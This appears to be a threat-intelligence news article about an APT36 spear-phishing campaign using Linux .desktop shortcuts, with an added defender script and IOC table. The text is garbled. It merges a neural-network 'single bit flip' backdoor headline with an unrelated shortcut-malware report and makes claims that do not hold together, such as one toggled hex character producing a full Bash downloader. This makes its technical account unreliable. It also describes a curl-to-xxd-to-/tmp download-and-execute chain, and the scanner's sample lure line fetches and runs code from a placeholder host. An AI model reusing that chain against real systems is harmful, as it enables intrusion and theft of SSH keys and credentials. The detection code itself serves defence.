OneFlip Attack Backdoors AI Systems by Flipping a Single Bit in Neural Networks

By Declan Murphy, August 26, 2025
CYFIRMA researchers have uncovered a campaign they have codenamed “OneFlip”, an operation that demonstrates how a single-bit modification inside a seemingly benign file can be enough to re-pivot a neural-network-driven security workflow and open a backdoor on the underlying host.

Transparent Tribe (APT36) is leveraging the trick against Indian Government networks that depend on the indigenous BOSS GNU/Linux distribution, while continuing to run a parallel Windows lure for mixed-fleet environments.

The group’s lure, first seen on 1 August 2025, arrives by spear-phishing email as the archive “Meeting_Notice_Ltr_ID1543ops.pdf_.zip”.

Inside sits a shortcut called “Meeting_Ltr_ID1543ops.pdf.desktop” whose icon, MIME type and filename convince most users and, crucially, many machine-learning-based mail gateways that it is just a PDF link.

    APT36 weaponises Linux “.desktop” shortcuts

The novelty sits in the Exec= line. By toggling a single hexadecimal character, the attackers replace the legitimate viewer call with a Bash one-liner: curl silently retrieves a hex-encoded payload from hxxps://securestore[.]cv/Mt_dated_29.txt, pipes it through xxd to rebuild the raw ELF, drops it in /tmp with a timestamped name, marks it executable and launches it under nohup.

Bash shell

Firefox is then opened on an innocuous Google Drive PDF to complete the illusion of normality.

Because the file is declared Type=Application and Terminal=false, no console appears, while X-GNOME-Autostart-enabled=true ensures the shortcut fires on every log-in, flipping a single persistence bit inside the user’s session metadata.

Static inspection of the secondary ELF (“Meeting_Ltr_ID1543ops.pdf-.elf”, MD5 5bfeeae3cc9386513dc7c301c61e67a7) reveals stripped section names, oversized NOBITS regions and a hard-coded string for hxxp://modgovindia[.]space:4000.

ELF executable file

Runtime analysis confirms that the implant registers a per-user systemd timer named system-update.service and duplicates itself to ~/.config/systemd/systemd-update, then writes a reboot-persistent cron entry.

Stealth persistence established

Socket traces show non-blocking DNS queries via 127.0.0.53 that resolve modgovindia[.]space to 45[.]141[.]58[.]199, after which an encrypted bidirectional channel is negotiated on TCP/4000 for tasking and data exfiltration.

The implant has already been caught siphoning directory listings, local user databases and SSH keys, indicating the adversary is staging wider lateral movement.

The OneFlip moniker reflects the campaign’s ability to defeat automated inspection pipelines that now rely heavily on deep-learning classifiers.

By embedding its malicious logic in the unstructured Exec string and altering only a single byte relative to a legitimate template, the shortcut retains a near-identical feature vector; the neural net continues to score it as benign, while human operators see only a PDF icon.

This underscores a broader weakness in AI-assisted filtering: models that are not retrained on Linux-specific threat artefacts are blind to subtle, syntax-level perturbations.

Defenders should harden BOSS hosts with noexec mounts on /tmp, block outbound access to newly registered domains, and deploy an EDR that inspects .desktop files for compound shell directives.

Mail systems should detonate Linux shortcuts in sandboxed VMs because signature-less, single-bit polymorphism is now a proven bypass technique.

Finally, security teams running machine-learning detection stacks should expand training sets to include Linux UI artefacts and test adversarial robustness against command-concatenation patterns.

CYFIRMA assesses that APT36 will continue enriching its backdoor until host-based models learn to spot these minimal flips; until then, the group retains a stealthy, dual-platform foothold inside critical Indian Government infrastructure.
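As an added defender-side example (not code from the article or from CYFIRMA), the script below scores a .desktop file the way the recommended EDR inspection would: it parses the [Desktop Entry] group, flags an Exec= line that chains a shell wrapper, a downloader, a hex decoder, a /tmp drop, chmod and nohup, and flags the autostart key and the document-style double extension. The pattern set, the scoring thresholds and the two sample files (with a placeholder URL that is only scanned, never fetched) are this example's own assumptions.

```python
import re
from configparser import ConfigParser, Error
# Exec= traits a normal single-application launcher almost never needs; the pattern
# set, the scoring and the sample files are this example's assumptions, not CYFIRMA's.
EXEC_PATTERNS = {
    "shell_wrapper": re.compile(r"\b(?:ba|da)?sh\s+-c\b"),
    "command_chain": re.compile(r"\|\||&&|;|\|"),
    "downloader":    re.compile(r"\b(?:curl|wget)\b"),
    "decoder":       re.compile(r"\bxxd\b|\bbase64\b"),
    "tmp_drop":      re.compile(r"/(?:tmp|var/tmp|dev/shm)/"),
    "exec_bit":      re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b"),
    "detach":        re.compile(r"\b(?:nohup|setsid|disown)\b"),
}
DOC_SPOOF = re.compile(r"\.(?:pdf|docx?|xlsx?|pptx?)[._-]*\.desktop$", re.I)  # x.pdf.desktop

def parse_desktop(text):
    """Return the [Desktop Entry] group with original key case, or None if unparsable."""
    cp = ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str            # keep 'Exec', 'X-GNOME-Autostart-enabled' as written
    try:
        cp.read_string(text)
    except Error:
        return None
    return dict(cp["Desktop Entry"]) if cp.has_section("Desktop Entry") else None

def assess(filename, text):
    """Return (sorted findings, verdict) for one .desktop file."""
    entry = parse_desktop(text)
    if entry is None:
        return ["no_desktop_entry"], "malformed"
    findings = ["document_extension_spoof"] if DOC_SPOOF.search(filename) else []
    exec_line = entry.get("Exec", "")
    findings += [n for n, rx in EXEC_PATTERNS.items() if rx.search(exec_line)]
    if entry.get("X-GNOME-Autostart-enabled", "").lower() == "true":
        findings.append("autostart_persistence")   # re-fires at every login
    verdict = "malicious" if len(findings) >= 4 else "suspicious" if findings else "clean"
    return sorted(findings), verdict

# Constructed samples: a normal launcher, and one shaped like the lure described
# above (placeholder URL; nothing is fetched or executed, the string is only scanned).
BENIGN = "[Desktop Entry]\nType=Application\nName=PDF Viewer\nExec=evince %U\nTerminal=false\n"
LURE = (
    "[Desktop Entry]\nType=Application\nName=Meeting_Ltr.pdf\nIcon=application-pdf\n"
    "Terminal=false\nX-GNOME-Autostart-enabled=true\n"
    'Exec=bash -c "curl -s https://example.invalid/p.txt | xxd -r -p > /tmp/x; '
    'chmod +x /tmp/x; nohup /tmp/x & firefox https://example.invalid/doc.pdf"\n'
)

if __name__ == "__main__":
    for name, body in (("viewer.desktop", BENIGN), ("Meeting_Ltr_ID1543ops.pdf.desktop", LURE)):
        print(name, *assess(name, body))
```

The benign launcher scores clean while the lure-shaped file trips every Exec= heuristic plus the autostart and double-extension checks, which is the multi-signal view a single-byte change cannot easily hide from.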

Indicators of Compromise

S.No  Indicator                                                          Type / Action
1     508a2bcaa4c511f7db2d4491bb76effaa7231d66110c28632b95c77be40ea6b1   SHA-256 / Block
2     8f8da8861c368e74b9b5c1c59e64ef00690c5eff4a95e1b4fcf386973895bef1   SHA-256 / Block
3     e689afee5f7bdbd1613bd9a3915ef2a185a05c72aaae4df3dee988fa7109cb0b   SHA-256 / Block
4     securestore[.]cv                                                   Domain / Block
5     modgovindia[.]space                                                Domain / Block
6     45[.]141[.]58[.]199                                                IP / Monitor
